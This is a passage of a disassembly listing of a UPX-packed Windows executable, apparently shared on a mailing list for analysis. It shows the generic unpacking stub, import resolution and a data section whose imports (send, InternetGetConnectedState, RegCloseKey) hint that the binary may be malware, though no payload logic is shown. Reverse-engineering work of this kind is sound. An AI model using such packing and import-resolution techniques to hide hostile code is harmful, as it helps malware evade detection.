UPX1:00407208 loc_407208:                             ; CODE XREF:
start+29j
UPX1:00407208                 mov     al, [esi]
UPX1:0040720A                 inc     esi
UPX1:0040720B                 mov     [edi], al
UPX1:0040720D                 inc     edi
UPX1:0040720E 
UPX1:0040720E loc_40720E:                             ; CODE XREF:
start+B6j
UPX1:0040720E                                         ; start+CDj
UPX1:0040720E                 add     ebx, ebx
UPX1:00407210                 jnz     short loc_407219
UPX1:00407212 
UPX1:00407212 loc_407212:                             ; CODE XREF:
start+10j
UPX1:00407212                 mov     ebx, [esi]
UPX1:00407214                 sub     esi, 0FFFFFFFCh
UPX1:00407217                 adc     ebx, ebx
UPX1:00407219 
UPX1:00407219 loc_407219:                             ; CODE XREF:
start+20j
UPX1:00407219                 jb      short loc_407208
UPX1:0040721B                 mov     eax, 1
UPX1:00407220 
UPX1:00407220 loc_407220:                             ; CODE XREF:
start+3Fj
UPX1:00407220                                         ; start+4Aj
UPX1:00407220                 add     ebx, ebx
UPX1:00407222                 jnz     short loc_40722B
UPX1:00407224                 mov     ebx, [esi]
UPX1:00407226                 sub     esi, 0FFFFFFFCh
UPX1:00407229                 adc     ebx, ebx
UPX1:0040722B 
UPX1:0040722B loc_40722B:                             ; CODE XREF:
start+32j
UPX1:0040722B                 adc     eax, eax
UPX1:0040722D                 add     ebx, ebx
UPX1:0040722F                 jnb     short loc_407220
UPX1:00407231                 jnz     short loc_40723C
UPX1:00407233                 mov     ebx, [esi]
UPX1:00407235                 sub     esi, 0FFFFFFFCh
UPX1:00407238                 adc     ebx, ebx
UPX1:0040723A                 jnb     short loc_407220
UPX1:0040723C 
UPX1:0040723C loc_40723C:                             ; CODE XREF:
start+41j
UPX1:0040723C                 xor     ecx, ecx
UPX1:0040723E                 sub     eax, 3
UPX1:00407241                 jb      short loc_407250
UPX1:00407243                 shl     eax, 8
UPX1:00407246                 mov     al, [esi]
UPX1:00407248                 inc     esi
UPX1:00407249                 xor     eax, 0FFFFFFFFh
UPX1:0040724C                 jz      short loc_4072C2
UPX1:0040724E                 mov     ebp, eax
UPX1:00407250 
UPX1:00407250 loc_407250:                             ; CODE XREF:
start+51j
UPX1:00407250                 add     ebx, ebx
UPX1:00407252                 jnz     short loc_40725B
UPX1:00407254                 mov     ebx, [esi]
UPX1:00407256                 sub     esi, 0FFFFFFFCh
UPX1:00407259                 adc     ebx, ebx
UPX1:0040725B 
UPX1:0040725B loc_40725B:                             ; CODE XREF:
start+62j
UPX1:0040725B                 adc     ecx, ecx
UPX1:0040725D                 add     ebx, ebx
UPX1:0040725F                 jnz     short loc_407268
UPX1:00407261                 mov     ebx, [esi]
UPX1:00407263                 sub     esi, 0FFFFFFFCh
UPX1:00407266                 adc     ebx, ebx
UPX1:00407268 
UPX1:00407268 loc_407268:                             ; CODE XREF:
start+6Fj
UPX1:00407268                 adc     ecx, ecx
UPX1:0040726A                 jnz     short loc_40728C
UPX1:0040726C                 inc     ecx
UPX1:0040726D 
UPX1:0040726D loc_40726D:                             ; CODE XREF:
start+8Cj
UPX1:0040726D                                         ; start+97j
UPX1:0040726D                 add     ebx, ebx
UPX1:0040726F                 jnz     short loc_407278
UPX1:00407271                 mov     ebx, [esi]
UPX1:00407273                 sub     esi, 0FFFFFFFCh
UPX1:00407276                 adc     ebx, ebx
UPX1:00407278 
UPX1:00407278 loc_407278:                             ; CODE XREF:
start+7Fj
UPX1:00407278                 adc     ecx, ecx
UPX1:0040727A                 add     ebx, ebx
UPX1:0040727C                 jnb     short loc_40726D
UPX1:0040727E                 jnz     short loc_407289
UPX1:00407280                 mov     ebx, [esi]
UPX1:00407282                 sub     esi, 0FFFFFFFCh
UPX1:00407285                 adc     ebx, ebx
UPX1:00407287                 jnb     short loc_40726D
UPX1:00407289 
UPX1:00407289 loc_407289:                             ; CODE XREF:
start+8Ej
UPX1:00407289                 add     ecx, 2
UPX1:0040728C 
UPX1:0040728C loc_40728C:                             ; CODE XREF:
start+7Aj
UPX1:0040728C                 cmp     ebp, 0FFFFF300h
UPX1:00407292                 adc     ecx, 1
UPX1:00407295                 lea     edx, [edi+ebp]
UPX1:00407298                 cmp     ebp, 0FFFFFFFCh
UPX1:0040729B                 jbe     short loc_4072AC
UPX1:0040729D 
UPX1:0040729D loc_40729D:                             ; CODE XREF:
start+B4j
UPX1:0040729D                 mov     al, [edx]
UPX1:0040729F                 inc     edx
UPX1:004072A0                 mov     [edi], al
UPX1:004072A2                 inc     edi
UPX1:004072A3                 dec     ecx
UPX1:004072A4                 jnz     short loc_40729D
UPX1:004072A6                 jmp     loc_40720E
UPX1:004072A6 ;
------------------------------------------------------------------------
---
UPX1:004072AB                 align 4
UPX1:004072AC 
UPX1:004072AC loc_4072AC:                             ; CODE XREF:
start+ABj
UPX1:004072AC                                         ; start+C9j
UPX1:004072AC                 mov     eax, [edx]
UPX1:004072AE                 add     edx, 4
UPX1:004072B1                 mov     [edi], eax
UPX1:004072B3                 add     edi, 4
UPX1:004072B6                 sub     ecx, 4
UPX1:004072B9                 ja      short loc_4072AC
UPX1:004072BB                 add     edi, ecx
UPX1:004072BD                 jmp     loc_40720E
UPX1:004072C2 ;
------------------------------------------------------------------------
---
UPX1:004072C2 
UPX1:004072C2 loc_4072C2:                             ; CODE XREF:
start+5Cj
UPX1:004072C2                 pop     esi
UPX1:004072C3                 mov     edi, esi
UPX1:004072C5                 mov     ecx, 0A3h
UPX1:004072CA 
UPX1:004072CA loc_4072CA:                             ; CODE XREF:
start+E1j
UPX1:004072CA                                         ; start+E6j
UPX1:004072CA                 mov     al, [edi]
UPX1:004072CC                 inc     edi
UPX1:004072CD                 sub     al, 0E8h
UPX1:004072CF 
UPX1:004072CF loc_4072CF:                             ; CODE XREF:
start+104j
UPX1:004072CF                 cmp     al, 1
UPX1:004072D1                 ja      short loc_4072CA
UPX1:004072D3                 cmp     byte ptr [edi], 1
UPX1:004072D6                 jnz     short loc_4072CA
UPX1:004072D8                 mov     eax, [edi]
UPX1:004072DA                 mov     bl, [edi+4]
UPX1:004072DD                 shr     ax, 8
UPX1:004072E1                 rol     eax, 10h
UPX1:004072E4                 xchg    al, ah
UPX1:004072E6                 sub     eax, edi
UPX1:004072E8                 sub     bl, 0E8h
UPX1:004072EB                 add     eax, esi
UPX1:004072ED                 mov     [edi], eax
UPX1:004072EF                 add     edi, 5
UPX1:004072F2                 mov     eax, ebx
UPX1:004072F4                 loop    loc_4072CF
UPX1:004072F6                 lea     edi, [esi+5000h]
UPX1:004072FC 
UPX1:004072FC loc_4072FC:                             ; CODE XREF:
start+12Ej
UPX1:004072FC                 mov     eax, [edi]
UPX1:004072FE                 or      eax, eax
UPX1:00407300                 jz      short loc_40733E
UPX1:00407302                 mov     ebx, [edi+4]
UPX1:00407305                 lea     eax, [eax+esi+7000h]
UPX1:0040730C                 add     ebx, esi
UPX1:0040730E                 push    eax
UPX1:0040730F                 add     edi, 8
UPX1:00407312                 call    dword ptr [esi+7078h]
UPX1:00407318                 xchg    eax, ebp
UPX1:00407319 
UPX1:00407319 loc_407319:                             ; CODE XREF:
start+146j
UPX1:00407319                 mov     al, [edi]
UPX1:0040731B                 inc     edi
UPX1:0040731C                 or      al, al
UPX1:0040731E                 jz      short loc_4072FC
UPX1:00407320                 mov     ecx, edi
UPX1:00407322                 push    edi
UPX1:00407323                 dec     eax
UPX1:00407324                 repne scasb
UPX1:00407326                 push    ebp
UPX1:00407327                 call    dword ptr [esi+707Ch]
UPX1:0040732D                 or      eax, eax
UPX1:0040732F                 jz      short loc_407338
UPX1:00407331                 mov     [ebx], eax
UPX1:00407333                 add     ebx, 4
UPX1:00407336                 jmp     short loc_407319
UPX1:00407338 ;
------------------------------------------------------------------------
---
UPX1:00407338 
UPX1:00407338 loc_407338:                             ; CODE XREF:
start+13Fj
UPX1:00407338                 call    dword ptr [esi+7080h]
UPX1:0040733E 
UPX1:0040733E loc_40733E:                             ; CODE XREF:
start+110j
UPX1:0040733E                 popa
UPX1:0040733F                 jmp     near ptr dword_4011CB
UPX1:0040733F start           endp
UPX1:0040733F 
UPX1:0040733F ;
------------------------------------------------------------------------
---
UPX1:00407344                 dd 2Fh dup(0)
UPX1:00407400                 dd 300h dup(?)
UPX1:00407400 UPX1            ends
UPX1:00407400 
UPX2:00408000 ; Section 3. (virtual address 00008000)
UPX2:00408000 ; Virtual size                  : 00001000 (   4096.)
UPX2:00408000 ; Section size in file          : 00000200 (    512.)
UPX2:00408000 ; Offset to raw data for section: 00001600
UPX2:00408000 ; Flags C0000040: Data Readable Writable
UPX2:00408000 ; Alignment     : 16 bytes ?
UPX2:00408000 ;
------------------------------------------------------------------------
---
UPX2:00408000 
UPX2:00408000 ; Segment type: Pure data
UPX2:00408000 ; Segment permissions: Read/Write
UPX2:00408000 UPX2            segment para public 'DATA' use32
UPX2:00408000                 assume cs:UPX2
UPX2:00408000                 ;org 408000h
UPX2:00408000                 db    0 ;  
UPX2:00408001                 db    0 ;  
UPX2:00408002                 db    0 ;  
UPX2:00408003                 db    0 ;  
UPX2:00408004                 db    0 ;  
UPX2:00408005                 db    0 ;  
UPX2:00408006                 db    0 ;  
UPX2:00408007                 db    0 ;  
UPX2:00408008                 db    0 ;  
UPX2:00408009                 db    0 ;  
UPX2:0040800A                 db    0 ;  
UPX2:0040800B                 db    0 ;  
UPX2:0040800C                 db 0A8h ; ¿
UPX2:0040800D                 db  80h ; Ç
UPX2:0040800E                 db    0 ;  
UPX2:0040800F                 db    0 ;  
UPX2:00408010                 db  78h ; x
UPX2:00408011                 db  80h ; Ç
UPX2:00408012                 db    0 ;  
UPX2:00408013                 db    0 ;  
UPX2:00408014                 db    0 ;  
UPX2:00408015                 db    0 ;  
UPX2:00408016                 db    0 ;  
UPX2:00408017                 db    0 ;  
UPX2:00408018                 db    0 ;  
UPX2:00408019                 db    0 ;  
UPX2:0040801A                 db    0 ;  
UPX2:0040801B                 db    0 ;  
UPX2:0040801C                 db    0 ;  
UPX2:0040801D                 db    0 ;  
UPX2:0040801E                 db    0 ;  
UPX2:0040801F                 db    0 ;  
UPX2:00408020                 db 0B5h ; ¦
UPX2:00408021                 db  80h ; Ç
UPX2:00408022                 db    0 ;  
UPX2:00408023                 db    0 ;  
UPX2:00408024                 db  88h ; ê
UPX2:00408025                 db  80h ; Ç
UPX2:00408026                 db    0 ;  
UPX2:00408027                 db    0 ;  
UPX2:00408028                 db    0 ;  
UPX2:00408029                 db    0 ;  
UPX2:0040802A                 db    0 ;  
UPX2:0040802B                 db    0 ;  
UPX2:0040802C                 db    0 ;  
UPX2:0040802D                 db    0 ;  
UPX2:0040802E                 db    0 ;  
UPX2:0040802F                 db    0 ;  
UPX2:00408030                 db    0 ;  
UPX2:00408031                 db    0 ;  
UPX2:00408032                 db    0 ;  
UPX2:00408033                 db    0 ;  
UPX2:00408034                 db 0C2h ; -
UPX2:00408035                 db  80h ; Ç
UPX2:00408036                 db    0 ;  
UPX2:00408037                 db    0 ;  
UPX2:00408038                 db  90h ; É
UPX2:00408039                 db  80h ; Ç
UPX2:0040803A                 db    0 ;  
UPX2:0040803B                 db    0 ;  
UPX2:0040803C                 db    0 ;  
UPX2:0040803D                 db    0 ;  
UPX2:0040803E                 db    0 ;  
UPX2:0040803F                 db    0 ;  
UPX2:00408040                 db    0 ;  
UPX2:00408041                 db    0 ;  
UPX2:00408042                 db    0 ;  
UPX2:00408043                 db    0 ;  
UPX2:00408044                 db    0 ;  
UPX2:00408045                 db    0 ;  
UPX2:00408046                 db    0 ;  
UPX2:00408047                 db    0 ;  
UPX2:00408048                 db 0CDh ; -
UPX2:00408049                 db  80h ; Ç
UPX2:0040804A                 db    0 ;  
UPX2:0040804B                 db    0 ;  
UPX2:0040804C                 db  98h ; ÿ
UPX2:0040804D                 db  80h ; Ç
UPX2:0040804E                 db    0 ;  
UPX2:0040804F                 db    0 ;  
UPX2:00408050                 db    0 ;  
UPX2:00408051                 db    0 ;  
UPX2:00408052                 db    0 ;  
UPX2:00408053                 db    0 ;  
UPX2:00408054                 db    0 ;  
UPX2:00408055                 db    0 ;  
UPX2:00408056                 db    0 ;  
UPX2:00408057                 db    0 ;  
UPX2:00408058                 db    0 ;  
UPX2:00408059                 db    0 ;  
UPX2:0040805A                 db    0 ;  
UPX2:0040805B                 db    0 ;  
UPX2:0040805C                 db 0D9h ; +
UPX2:0040805D                 db  80h ; Ç
UPX2:0040805E                 db    0 ;  
UPX2:0040805F                 db    0 ;  
UPX2:00408060                 db 0A0h ; á
UPX2:00408061                 db  80h ; Ç
UPX2:00408062                 db    0 ;  
UPX2:00408063                 db    0 ;  
UPX2:00408064                 db    0 ;  
UPX2:00408065                 db    0 ;  
UPX2:00408066                 db    0 ;  
UPX2:00408067                 db    0 ;  
UPX2:00408068                 db    0 ;  
UPX2:00408069                 db    0 ;  
UPX2:0040806A                 db    0 ;  
UPX2:0040806B                 db    0 ;  
UPX2:0040806C                 db    0 ;  
UPX2:0040806D                 db    0 ;  
UPX2:0040806E                 db    0 ;  
UPX2:0040806F                 db    0 ;  
UPX2:00408070                 db    0 ;  
UPX2:00408071                 db    0 ;  
UPX2:00408072                 db    0 ;  
UPX2:00408073                 db    0 ;  
UPX2:00408074                 db    0 ;  
UPX2:00408075                 db    0 ;  
UPX2:00408076                 db    0 ;  
UPX2:00408077                 db    0 ;  
UPX2:00408078 ; 
UPX2:00408078 ; Imports from KERNEL32.DLL
UPX2:00408078 ; 
UPX2:00408078 ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
UPX2:00408078 LoadLibraryA    dd ?
UPX2:0040807C ; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR
lpProcName)
UPX2:0040807C GetProcAddress  dd ?
UPX2:00408080 ; void __stdcall ExitProcess(UINT uExitCode)
UPX2:00408080 ExitProcess     dd ?
UPX2:00408084                 dd 0
UPX2:00408088 ; 
UPX2:00408088 ; Imports from ADVAPI32.DLL
UPX2:00408088 ; 
UPX2:00408088 ; LONG __stdcall RegCloseKey(HKEY hKey)
UPX2:00408088 RegCloseKey     dd ?
UPX2:0040808C                 dd 0
UPX2:00408090 ; 
UPX2:00408090 ; Imports from CRTDLL.DLL
UPX2:00408090 ; 
UPX2:00408090 atoi            dd ?
UPX2:00408094                 dd 0
UPX2:00408098 ; 
UPX2:00408098 ; Imports from WININET.DLL
UPX2:00408098 ; 
UPX2:00408098 InternetGetConnectedState dd ?
UPX2:0040809C                 dd 0
UPX2:004080A0 ; 
UPX2:004080A0 ; Imports from WS2_32.DLL
UPX2:004080A0 ; 
UPX2:004080A0 ; int __stdcall send(SOCKET s,const char *buf,int len,int
flags)
UPX2:004080A0 send            dd ?
UPX2:004080A4                 dd 0
UPX2:004080A8 aKernel32_dll   db 'KERNEL32.DLL',0
UPX2:004080B5 aAdvapi32_dll   db 'ADVAPI32.DLL',0
UPX2:004080C2 aCrtdll_dll     db 'CRTDLL.DLL',0
UPX2:004080CD aWininet_dll    db 'WININET.DLL',0
UPX2:004080D9 aWs2_32_dll     db 'WS2_32.DLL',0
UPX2:004080E4                 db    0 ;  
UPX2:004080E5                 db    0 ;  
UPX2:004080E6                 db  4Ch ; L
UPX2:004080E7                 db  6Fh ; o
UPX2:004080E8                 db  61h ; a
UPX2:004080E9                 db  64h ; d
UPX2:004080EA                 db  4Ch ; L
UPX2:004080EB                 db  69h ; i
UPX2:004080EC                 db  62h ; b
UPX2:004080ED                 db  72h ; r
UPX2:004080EE                 db  61h ; a
UPX2:004080EF                 db  72h ; r
UPX2:004080F0                 db  79h ; y
UPX2:004080F1                 db  41h ; A
UPX2:004080F2                 db    0 ;  
UPX2:004080F3                 db    0 ;  
UPX2:004080F4                 db  47h ; G
UPX2:004080F5                 db  65h ; e
UPX2:004080F6                 db  74h ; t
UPX2:004080F7                 db  50h ; P
UPX2:004080F8                 db  72h ; r
UPX2:004080F9                 db  6Fh ; o
UPX2:004080FA                 db  63h ; c
UPX2:004080FB                 db  41h ; A
UPX2:004080FC                 db  64h ; d
UPX2:004080FD                 db  64h ; d
UPX2:004080FE                 db  72h ; r
UPX2:004080FF                 db  65h ; e
UPX2:00408100                 db  73h ; s
UPX2:00408101                 db  73h ; s
UPX2:00408102                 db    0 ;  
UPX2:00408103                 db    0 ;  
UPX2:00408104                 db  45h ; E
UPX2:00408105                 db  78h ; x
UPX2:00408106                 db  69h ; i
UPX2:00408107                 db  74h ; t
UPX2:00408108                 db  50h ; P
UPX2:00408109                 db  72h ; r
UPX2:0040810A                 db  6Fh ; o
UPX2:0040810B                 db  63h ; c
UPX2:0040810C                 db  65h ; e
UPX2:0040810D                 db  73h ; s
UPX2:0040810E                 db  73h ; s
UPX2:0040810F                 db    0 ;  
UPX2:00408110                 db    0 ;  
UPX2:00408111                 db    0 ;  
UPX2:00408112                 db  52h ; R
UPX2:00408113                 db  65h ; e
UPX2:00408114                 db  67h ; g
UPX2:00408115                 db  43h ; C
UPX2:00408116                 db  6Ch ; l
UPX2:00408117                 db  6Fh ; o
UPX2:00408118                 db  73h ; s
UPX2:00408119                 db  65h ; e
UPX2:0040811A                 db  4Bh ; K
UPX2:0040811B                 db  65h ; e
UPX2:0040811C                 db  79h ; y
UPX2:0040811D                 db    0 ;  
UPX2:0040811E                 db    0 ;  
UPX2:0040811F                 db    0 ;  
UPX2:00408120                 db  61h ; a
UPX2:00408121                 db  74h ; t
UPX2:00408122                 db  6Fh ; o
UPX2:00408123                 db  69h ; i
UPX2:00408124                 db    0 ;  
UPX2:00408125                 db    0 ;  
UPX2:00408126                 db  49h ; I
UPX2:00408127                 db  6Eh ; n
UPX2:00408128                 db  74h ; t
UPX2:00408129                 db  65h ; e
UPX2:0040812A                 db  72h ; r
UPX2:0040812B                 db  6Eh ; n
UPX2:0040812C                 db  65h ; e
UPX2:0040812D                 db  74h ; t
UPX2:0040812E                 db  47h ; G
UPX2:0040812F                 db  65h ; e
UPX2:00408130                 db  74h ; t
UPX2:00408131                 db  43h ; C
UPX2:00408132                 db  6Fh ; o
UPX2:00408133                 db  6Eh ; n
UPX2:00408134                 db  6Eh ; n
UPX2:00408135                 db  65h ; e
UPX2:00408136                 db  63h ; c
UPX2:00408137                 db  74h ; t
UPX2:00408138                 db  65h ; e
UPX2:00408139                 db  64h ; d
UPX2:0040813A                 db  53h ; S
UPX2:0040813B                 db  74h ; t
UPX2:0040813C                 db  61h ; a
UPX2:0040813D                 db  74h ; t
UPX2:0040813E                 db  65h ; e
UPX2:0040813F                 db    0 ;  
UPX2:00408140                 db    0 ;  
UPX2:00408141                 db    0 ;  
UPX2:00408142                 db  73h ; s
UPX2:00408143                 db  65h ; e
UPX2:00408144                 db  6Eh ; n
UPX2:00408145                 db  64h ; d
UPX2:00408146                 db    0 ;  
UPX2:00408147                 db    0 ;  
UPX2:00408148                 db    0 ;  
UPX2:00408149                 db    0 ;  
UPX2:0040814A                 db    0 ;  
UPX2:0040814B                 db    0 ;  
UPX2:0040814C                 db    0 ;  
UPX2:0040814D                 db    0 ;  
UPX2:0040814E                 db    0 ;  
UPX2:0040814F                 db    0 ;  
UPX2:00408150                 db    0 ;  
UPX2:00408151                 db    0 ;  
UPX2:00408152                 db    0 ;  
UPX2:00408153                 db    0 ;  
UPX2:00408154                 db    0 ;  
UPX2:00408155                 db    0 ;  
UPX2:00408156                 db    0 ;  
UPX2:00408157                 db    0 ;  
UPX2:00408158                 db    0 ;  
UPX2:00408159                 db    0 ;  
UPX2:0040815A                 db    0 ;  
UPX2:0040815B                 db    0 ;  
UPX2:0040815C                 db    0 ;  
UPX2:0040815D                 db    0 ;  
UPX2:0040815E                 db    0 ;  
UPX2:0040815F                 db    0 ;  
UPX2:00408160                 db    0 ;  
UPX2:00408161                 db    0 ;  
UPX2:00408162                 db    0 ;  
UPX2:00408163                 db    0 ;  
UPX2:00408164                 db    0 ;  
UPX2:00408165                 db    0 ;  
UPX2:00408166                 db    0 ;  
UPX2:00408167                 db    0 ;  
UPX2:00408168                 db    0 ;  
UPX2:00408169                 db    0 ;  
UPX2:0040816A                 db    0 ;  
UPX2:0040816B                 db    0 ;  
UPX2:0040816C                 db    0 ;  
UPX2:0040816D                 db    0 ;  
UPX2:0040816E                 db    0 ;  
UPX2:0040816F                 db    0 ;  
UPX2:00408170                 db    0 ;  
UPX2:00408171                 db    0 ;  
UPX2:00408172                 db    0 ;  
UPX2:00408173                 db    0 ;  
UPX2:00408174                 db    0 ;  
UPX2:00408175                 db    0 ;  
UPX2:00408176                 db    0 ;  
UPX2:00408177                 db    0 ;  
UPX2:00408178                 db    0 ;  
UPX2:00408179                 db    0 ;  
UPX2:0040817A                 db    0 ;  
UPX2:0040817B                 db    0 ;  
UPX2:0040817C                 db    0 ;  
UPX2:0040817D                 db    0 ;  
UPX2:0040817E                 db    0 ;  
UPX2:0040817F                 db    0 ;  
UPX2:00408180                 db    0 ;  
UPX2:00408181                 db    0 ;  
UPX2:00408182                 db    0 ;  
UPX2:00408183                 db    0 ;  
UPX2:00408184                 db    0 ;  
UPX2:00408185                 db    0 ;  
UPX2:00408186                 db    0 ;  
UPX2:00408187                 db    0 ;  
UPX2:00408188                 db    0 ;  
UPX2:00408189                 db    0 ;  
UPX2:0040818A                 db    0 ;  
UPX2:0040818B                 db    0 ;  
UPX2:0040818C                 db    0 ;  
UPX2:0040818D                 db    0 ;  
UPX2:0040818E                 db    0 ;  
UPX2:0040818F                 db    0 ;  
UPX2:00408190                 db    0 ;  
UPX2:00408191                 db    0 ;  
UPX2:00408192                 db    0 ;  
UPX2:00408193                 db    0 ;  
UPX2:00408194                 db    0 ;  
UPX2:00408195                 db    0 ;  
UPX2:00408196                 db    0 ;  
UPX2:00408197                 db    0 ;  
UPX2:00408198                 db    0 ;  
UPX2:00408199                 db    0 ;  
UPX2:0040819A                 db    0 ;  
UPX2:0040819B                 db    0 ;  
UPX2:0040819C                 db    0 ;  
UPX2:0040819D                 db    0 ;  
UPX2:0040819E                 db    0 ;  
UPX2:0040819F                 db    0 ;  
UPX2:004081A0                 db    0 ;  
UPX2:004081A1                 db    0 ;  
UPX2:004081A2                 db    0 ;  
UPX2:004081A3                 db    0 ;  
UPX2:004081A4                 db    0 ;  
UPX2:004081A5                 db    0 ;  
UPX2:004081A6                 db    0 ;  
UPX2:004081A7                 db    0 ;  
UPX2:004081A8                 db    0 ;  
UPX2:004081A9                 db    0 ;  
UPX2:004081AA                 db    0 ;  
UPX2:004081AB                 db    0 ;  
UPX2:004081AC                 db    0 ;  
UPX2:004081AD                 db    0 ;  
UPX2:004081AE                 db    0 ;  
UPX2:004081AF                 db    0 ;  
UPX2:004081B0                 db    0 ;  
UPX2:004081B1                 db    0 ;  
UPX2:004081B2                 db    0 ;  
UPX2:004081B3                 db    0 ;  
UPX2:004081B4                 db    0 ;  
UPX2:004081B5                 db    0 ;  
UPX2:004081B6                 db    0 ;  
UPX2:004081B7                 db    0 ;  
UPX2:004081B8                 db    0 ;  
UPX2:004081B9                 db    0 ;  
UPX2:004081BA                 db    0 ;  
UPX2:004081BB                 db    0 ;  
UPX2:004081BC                 db    0 ;  
UPX2:004081BD                 db    0 ;  
UPX2:004081BE                 db    0 ;  
UPX2:004081BF                 db    0 ;  
UPX2:004081C0                 db    0 ;  
UPX2:004081C1                 db    0 ;  
UPX2:004081C2                 db    0 ;  
UPX2:004081C3                 db    0 ;  
UPX2:004081C4                 db    0 ;  
UPX2:004081C5                 db    0 ;  
UPX2:004081C6                 db    0 ;  
UPX2:004081C7                 db    0 ;  
UPX2:004081C8                 db    0 ;  
UPX2:004081C9                 db    0 ;  
UPX2:004081CA                 db    0 ;  
UPX2:004081CB                 db    0 ;  
UPX2:004081CC                 db    0 ;  
UPX2:004081CD                 db    0 ;  
UPX2:004081CE                 db    0 ;  
UPX2:004081CF                 db    0 ;  
UPX2:004081D0                 db    0 ;  
UPX2:004081D1                 db    0 ;  
UPX2:004081D2                 db    0 ;  
UPX2:004081D3                 db    0 ;  
UPX2:004081D4                 db    0 ;  
UPX2:004081D5                 db    0 ;  
UPX2:004081D6                 db    0 ;  
UPX2:004081D7                 db    0 ;  
UPX2:004081D8                 db    0 ;  
UPX2:004081D9                 db    0 ;  
UPX2:004081DA                 db    0 ;  
UPX2:004081DB                 db    0 ;  
UPX2:004081DC                 db    0 ;  
UPX2:004081DD                 db    0 ;  
UPX2:004081DE                 db    0 ;  
UPX2:004081DF                 db    0 ;  
UPX2:004081E0                 db    0 ;  
UPX2:004081E1                 db    0 ;  
UPX2:004081E2                 db    0 ;  
UPX2:004081E3                 db    0 ;  
UPX2:004081E4                 db    0 ;  
UPX2:004081E5                 db    0 ;  
UPX2:004081E6                 db    0 ;  
UPX2:004081E7                 db    0 ;  
UPX2:004081E8                 db    0 ;  
UPX2:004081E9                 db    0 ;  
UPX2:004081EA                 db    0 ;  
UPX2:004081EB                 db    0 ;  
UPX2:004081EC                 db    0 ;  
UPX2:004081ED                 db    0 ;  
UPX2:004081EE                 db    0 ;  
UPX2:004081EF                 db    0 ;  
UPX2:004081F0                 db    0 ;  
UPX2:004081F1                 db    0 ;  
UPX2:004081F2                 db    0 ;  
UPX2:004081F3                 db    0 ;  
UPX2:004081F4                 db    0 ;  
UPX2:004081F5                 db    0 ;  
UPX2:004081F6                 db    0 ;  
UPX2:004081F7                 db    0 ;  
UPX2:004081F8                 db    0 ;  
UPX2:004081F9                 db    0 ;  
UPX2:004081FA                 db    0 ;  
UPX2:004081FB                 db    0 ;  
UPX2:004081FC                 db    0 ;  
UPX2:004081FD                 db    0 ;  
UPX2:004081FE                 db    0 ;  
UPX2:004081FF                 db    0 ;  
UPX2:00408200                 align 1000h
UPX2:00408200 UPX2            ends
UPX2:00408200 
UPX2:00408200 
UPX2:00408200                 end start




More information about the list mailing list